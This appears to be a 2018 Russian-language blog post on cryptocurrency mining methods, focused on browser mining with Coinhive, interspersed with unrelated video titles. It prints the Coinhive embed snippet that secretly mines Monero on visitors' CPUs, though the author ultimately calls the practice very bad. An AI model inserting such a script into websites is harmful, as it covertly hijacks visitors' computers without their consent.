Способы майнинга. Браузерный

Опубликовано: 01.09.2018

видео Способы майнинга. Браузерный

НОВЫЙ СПОСОБ МАЙНИНГА БИТКОИНОВ! МАЙНКРАФТ КРИПТОГОРОД

Прогресс не стоит на месте. Так, благодаря хайпу вышедших криптовалют на рынок и резкий рост спроса, дали новую дорогу и Вид заработка. Появились майнинговые фермы, которые потребляют много электроэнергии, но некоторые страны ограничивают расход электроэнергии. Что же делать в таком случае?



На ряду с майнингами физическими, это например фермы  https://zeon18.ru/mining/  и виртуальными (сайты которые предлагают платную аренду оборудования, якобы ни за что беспокоится не нужно) есть браузерные майнинги , хотя конечно вторые вызывают определенные сомнения. Например, каков смысл сдавать оборудование дешевле, если оно должно майнить быстрее, нежели сдавать его аренду. Есть также приложения под андроид, но майнинг выходит сомнительный. Очень легко можно угробить свой телефон, так и не насобирав на пачку сигарет.

ЛУЧШИЙ СПОСОБ МАЙНИНГА БИТКОИНОВ! МАЙНКРАФТ КРИПТОГОРОД

Выделим 4 вида, список не безупречный

Принцип браузерного майнинга

Принцип браузерного майнинга прост, есть сайт coinhive, сейчас я перешел по ссылке и все что только могло обезопасить меня от этого сайта обезопасило (антивирус, адблок и т.д.). Потому что js, про который я напишу ниже воспринимается как вирусные систумы. Ведь хакеры легко могут устанавливать его на любые взломанные сайты.  Суть такова, что  после регистрации Вы можете подключить на свой сайт скрипт JS, который в тайне будет использовать процессор ваших посетителей для  майнинга. Майнить он будет такую крипту как Monero . Такой вариант можно рассматривать как вариант ухода от рекламы, но не спешите радоваться. Скрипт будет приносить пользу для сайтов минимум от 10000 уников в сутки.  Например мой бложик со своими 100 униками врядли сможет что-то заработать, но и ладно.


TOP 3 СПОСОБА МАЙНИНГА НА ОБЫЧНОМ КОМПЬЮТЕРЕ - БЕЗ ВЛОЖЕНИЙ 2018

Как настроить?

Вот код, подключения скрипта на сайт

<script src = "https://coinhive.com/lib/coinhive.min.js" > </script>

<script>

     var miner = new CoinHive . User ( 'hash' , 'login' ) ;

     miner . start ( ) ;

</script>

Подключение до боли простое, но не забудьте указать айдишник сайта и логин, в противном случае, все что намайнит скрипт пойдет в пользу сервиса. Также в документации есть настройки создаваемого объекта, уменьшение скорости работы, таким образом можно облегчить нагрузку на процессор и это радует.

Это хорошо или плохо?

Это ужасно плохо. Почему:

Очень негативное отношение со стороны ПС. Верятность того, что пользователь не вернется к Вам, потому что у Вас на сайте у него все тупит.

Хотя и второй пункт можно решить всего-то снижением нагрузки на процессор, но все равно не стоит забывать про первый пункт, который может вовсе стать для Вашего сайта роковым. Оно Вам надо?

Как узнать, что Ваш браузер майнит?

Все просто. Вы это поймете, когда у Вас начнет шуметь компьютер и процессор в диспетчере задач будет загружен на 100%. Компьютер будет работать с огромным трудом, еще бы.

Итог

Очень много крупных сервисов рассматривали этот вид майнинга как доп заработок, но к сожалению ничего не сложилось, дальше тестирования процесс не доходил.

Сам вид майнинга давно всем известен. С момента выхода до недавнего времени этот способ потерял актуальность, но недавно все возобновилось, этот способ стали вновь использовать. Возможно подыскивают способ модернизации, чтобы он, этот способ, удовлетворял критериям майнинга и никого не огорчал.

Идея майнинга в браузере крутая, но очень сырая, недоработанная. Возможно в скором времени все станет намного лучше, но пока рекомендую оставить эту тему, потому что мировые гиганты не особо поддерживают тему криптовалют. Как только ситуация изменится, Вы  узнаете  в новостях моего блога. Огромное Вам спасибо за Внимание.

 

IRC (Internet Relay Chat)
rss